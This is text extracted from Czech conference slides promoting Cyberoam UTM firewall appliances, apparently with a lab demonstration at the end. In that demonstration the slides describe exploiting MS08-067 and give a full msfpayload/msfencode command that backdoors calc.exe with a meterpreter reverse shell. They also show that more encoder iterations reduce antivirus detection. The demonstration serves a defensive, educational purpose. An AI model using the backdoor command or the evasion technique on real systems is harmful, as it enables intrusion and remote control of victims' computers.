Kliknutím lze upravit styl.
Popis konference + datum
Bezpečnostní řešení Alternetivo Michal (
[email protected]) Petr (
[email protected])
Proč UTM?
• Syndrom „mě se to stát nemůže“…? • Doba se mění a zranitelnosti jsou všude • OS, firewall, webové aplikace, souborové systémy, bot net, spam, D/DoS • IT administrátoři však - zdá se - nezaostávají:
Proč UTM?
• Spravovat více dílčích řešení je náročné (finančně, časově, administrativně, …) • Když dva dělají totéž, není to totéž!
Složitost síťové topologie
Více zařízení od více výrobců
Vyšší cena – CapEX a OpEX
Rozdílné dílčí logování a reportování
Nunto znát více konfiguračních rozhraní - školení
Kdo je Cyberoam?
Založeno 1999 Více než 550 zaměstnanců celosvětově Únor 2014 kupuje Cyberoam majoritní investor konkurenta Sohpos a společnosti se prezentují jako partneři, prodejní kanály se nemění Působnost ve více než 125 zemích světa Mezi TOP 3 hráči na poli UTM pobočky v USA, Indii a na Středním východě
2014: Sophos & Cyberoam
2013 Magic Quadrant for Unified Threat Management
Portfolio Cyberoam UTM UTM zařízení
Virtuální UTM
Pobočky, menší společnosti CR35wiNG, CR35iNG, CR25wiNG, CR25iNG, CR15wiNG, CR15iNG
Malé a střední společnosti CR300iNG, CR200iNG, CR100iNG, CR50iNG
Velké společnosti (NG FW) CR2500iNG CR1500iNG CR1000iNG CR750iNG CR500iNG
CRiV-1C, CRiV-2C, CRiV-4C, CRiV-8C, CRiV-12C
Co to sakra??? L8 security
• Patentovaná technologie
Cyberoam L8 „vkládá“ uživatelskou identitu jako „8. vrstvu“ ISO/OSI modelu Cyberoam UTM poskytují komplexní zabezpečení od L2 do L7 svázené s uživatelskou identitou.
UTM funkce
Layer 8 security Support for 3G/4G/WiMax
Cyberoam Live Demo
odkaz: http://demo.cyberoam.com přístupové údaje: guest /guest
Možno získat 30-ti dení testovací Trial CR virtual appliance
SI Firewall – klíčová myšlenka
Identita
+ Bezpečnost
+ Produktivita
+ Konektivita
Intrusion Prevention System •Vlastní výrobek (Signatury píše přímo Cyberoam) •4500+ signatur, IPS tuning •IPS politiky lze vztáhnout na uživatele, skupinu, IP adresy, atd.. •možnost definice více IPS politik •Lze vytvářet vlastní IPS signatury •identity-based alarmy & reporty •Automatické aktualizace v reálném čase •HTTP Proxy signatury •Základní ochrana před DoS a DDoS útoky (treshold)
GW Antivirus & AntiSpyware
•4 milliony+ signatur •Poskytovatel AV enginu: Avira •obousměrný sken: Web & Email •virová karanténa •skenuje HTTP, FTP, SMTP, POP3, HTTPS, IMAP a IM provoz •Aktualizace signatur každou půlhodinu
GW Antispam •Inbound/Outbound •tři úrovně skenování: • IP reputace • Real-time Blackhole List • Recurrent Pattern Detection •~98% úspěšnost detekce spamu •karanténa a Spam Digest •skenuje SMTP, POP3, IMAP
Web Application Firewall • Firewally/IPS nejsou schopny ochránit webové aplikace před neznámými hrozbami
Tradiční FW
WAF ochrana na Cyberoam UTM • & chrání webové aplikace a webové Webový aplikačníservery před útočníkyDatabázový server server • bez signatur (tzn. bez aktualizací)
Cyberoam UTM s WAF ochranou
• intuitivní detektor toku (automatické
přizpůsobení změn na stránce) • ochrana proti zranitelnostem definovaných OWASP top 10 • SSL Offloading • monitoring & reporting
Blokování neautorizovaného přístupu
Finanční úspory není nutné kupovat dedikovaný HW pro WAF
Jednoduchost nasazení
Síť organizace
Nevyžaduje změny ve stávajícím nastavení
Virtual Private Network (VPN)
Podpora mobilních VPN klientů
Podpora: IPSec, L2TP, PPTP, SSL VPN
Podporované platformy
Threat Free Tunneling (TFT)
MacOS
- skenování provozu ve VPN na malware, spam, nevhodný obsah, útoky Rozšířené možnosti
iOS Android iOS
- Failover: MPLS - VPN
- Failover: VPN - VPN SSL VPN client/clientless - zdarma
IPSec VPN L2TP VPN PPTP VPN
Android L2TP VPN
Logování a reporting
• • • • •
Klíčová výhoda: integrovaný reporting založený na identitě uživatele Reporty jsou ukládané na interní HDD cyberoam pro logy & reporting používá nástroj iView reporty jsou dostupné: tabulkový (XLS), PDF, on appliance L8 komplexní reporty: web surfing report, antivirus & antispam report, IDS a IPS reporty, Data transfer report, web trend report , compliance reporty a reporty sloužící pro firemní audity
UTM Device
Software / Device
Reporty
Reporty
Reporty
Aplikační reporty
Licenční politika
• Součástí UTM je zdarma – AAA – L8 SI firewall – SSL/IPSec VPN, (SSL VPN klient zdarma) – Management šířky pásma/QoS – Routing – Logování a reportování – Multi link management • Licence lze kupovat na období 1/2/3 roky + lze je prodlužovat
Licenční politika •
•
Balíčky licencí (úspora financí) – Total Value Subscription (TVS) – Security Value Subscription (SVS) – Complete Value Subscription (CVS) – Antivirus a antispam Balíčky jsou ještě ve verzích PLUS = support je 24x7 Balíčky Jednotlivé licence
SVS
SVSP
TVS
TVSP
CVS
Gateway Anti-Virus
●
●
●
●
●
Webový a aplikační filtr
●
●
●
●
●
Intrusion Prevention Systém
●
●
●
●
●
●
●
●
Gateway Anti-Spam
●
Web Application Firewall Outbound Anti-Spam
8x5 support 24x7 support
●
● ●
●
●
Virtuální… Realita
Bezpečnostní výzvy
•
skenování InterVM provozu • nelze provést skenování provozu mezi VM s externím bezpečnostním řešením • jediná kompromitovaná VM může ovlivnit své okolí
•
Riskujeme útoky cílené na: • Hypervisor management console • Hypervisor & hostovský OS
• • •
Potřeba řešení bezpečnosti ve virtuálním prostředí
Exploitace virtualizovaných web-aplikací hackery Ochrana virtuálních serverů proti průniku Řízení uživatelského přístupu
• vazba mezi přístupem ke službám a využití sítě s uživatelskou identitou
•
Bezpečnostní HW nemůže nabídnout inline ochranu • toky jsou neviditelné; vytvoření slepých míst v síti • nelze provádět forenzní analýzu
Cyberoam – virtuální appliance
•
virtuální rovina
•
skenuje definovaný provoz ve virtuálním prostředí
VM1
VM2
VM3
Apps
Apps
Apps
Windows OS
Linux OS
jiný OS
Hypervisor Hardware
Bezpečnostní aspekty • SI firewall • IPS • Antivirus • Anti-spyware & Anti-spam • Webová filtrace • Řízení aplikací • Web Application Firewall (WAF) •Cyberoam Virtual Private Network Virtual UTM appliance • Logging & Reporting • L8 bezpečnost založená na identitě
Cyberoam Virtual UTM - modely
Model
Licencování
CRiV-1C
nejvýše 1vCPU
CRiV-2C
nejvýše 2vCPU
CRiV-4C
nejvýše 4vCPU
CRiV-8C
nejvýše 8vCPU
CRiV-12C
nejvýše 12vCPU
Získejte 30 denní FREE demo Cyberoam Virtual appliance
Realita?
Realita je vlastně hrozně jednoduchá
Michal Dolejší
Intrusion Prevention System •Vlastní výrobek (Signatury píše přímo Cyberoam) •4500+ signatur, IPS tuning •IPS politiky lze vztáhnout na uživatele, skupinu, IP adresy, atd.. •možnost definice více IPS politik •Lze vytvářet vlastní IPS signatury •identity-based alarmy & reporty •Automatické aktualizace v reálném čase •HTTP Proxy signatury •Základní ochrana před DoS a DDoS útoky (treshold)
Praktická ukázka Heartbleed bug • veškeré aktuální oficiální SW nejsou tímto bugem ohroženy • problematické jsou pouze beta release: • 10.6.0 Beta-3 • 10.6.1 RC-1 • 10.6.1 RC-3
12.4. 2014 byl pro tyto verze vydán fix 10.6.1 RC-4
• současně s tímto byla vydána IP signatura (v3.11.61,v5.11.61) „OpenSSL TLS DTLS Heartbeat Information Disclosure“
Praktická ukázka Schéma topologie virtuální infrastruktury
KALI linux 10.10.1.10
vSwitch DMZ
DMZ – 10.10.1.10/24
WAN – 10.77.77.0/24
vSphere Client
vSwitch VM network (default)
Cyberoam vUTM vSwitch LAN
Windows XP SP3 172.16.16.100
LAN – 172.16.16.0/24
Windows 7 SP1 172.16.16.101
Praktická ukázka
Praktická ukázka Co je Metasploit Framework? • • • •
Nástroj pro vývoj a testování zranitelností systému nebo aplikací Vznikl v roce 2003 a byl převzat společností Rapid7 Napsán v jazyce Ruby Podporován jak pro Windows, tak i linux
Základní terminologie • Vulnerability • slabé místo, které umožňuje útočníkovi překonat zabezpečení systému • Exploit • kód, který umožňuje využít zranitelnosti systému • Payload • kód, který je spuštěn na systému po jeho exploitaci
Praktická ukázka Ukázka zranitelnosti MS08_67 pro WinXP • Útočník, který by tuto chybu úspěšně zneužil, by mohl vzdáleně převzít úplnou kontrolu nad ohroženým systémem. V počítačích se systémem Microsoft Windows 2000, Windows XP a Windows Server 2003 by útočník mohl této chyby zneužít prostřednictvím protokolu RPC bez ověřování a mohl by spustit libovolný kód. Pokud se pokus o zneužití nezdaří, může dojít k chybě v souboru Svchost.exe, která ovlivní službu Server. Služba Server poskytuje sdílení souborů, tisku a pojmenovaných kanálů v síti. Chyba je způsobena službou Server, která správně nezpracovává speciálně vytvořené požadavky RPC.
Prevence • MS08_067:Security Update pro Windows XP (KB958644) • Používejte IPS (např. v Cyberoamu )
Praktická ukázka Ukázka vytvoření backdooru pro Win7 • Na systému je: • zapnutý integrovaný FW • nainstalována aktualizovaná bezplatná verze Antiviru (konkrétně AVG 2014 free)
• Pro vytvoření backdooru ve stávajícím spustitelném „exe“ souboru použijeme funkcionality msfpayload a msfencode msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.1.10 R | msfencode -t exe -x calc.exe -o calc_new.exe -e x86/shikata_ga_nai -c 4 -k
• Následně na MSF spustíme handler a čekáme na příchozí připojení
Prevence • Nestahujte aplikace/dokumenty z neověřených zdrojů • Používejte IPS (např. v Cyberoamu )
Praktická ukázka Hromadné srovnání účinnosti antivirů • vliv počtu iterací encoderu na výsledek analýzy Antivirem • scan realizován dne 10.4. 2014 (virustotal.com)
45 40
počet iterací enkoderu
úspěšnost detekce
0
35/16
35 30
4
12/39
20
9/42
25
detekovano
20
nedetekovano
15 10 5 0 0
4
20
Závěrem
• • • • •
Hardware / cloud L8 security Flexibilita Poměr cena/výkon na výborné úrovni Referenční model zabezpečení není výhra
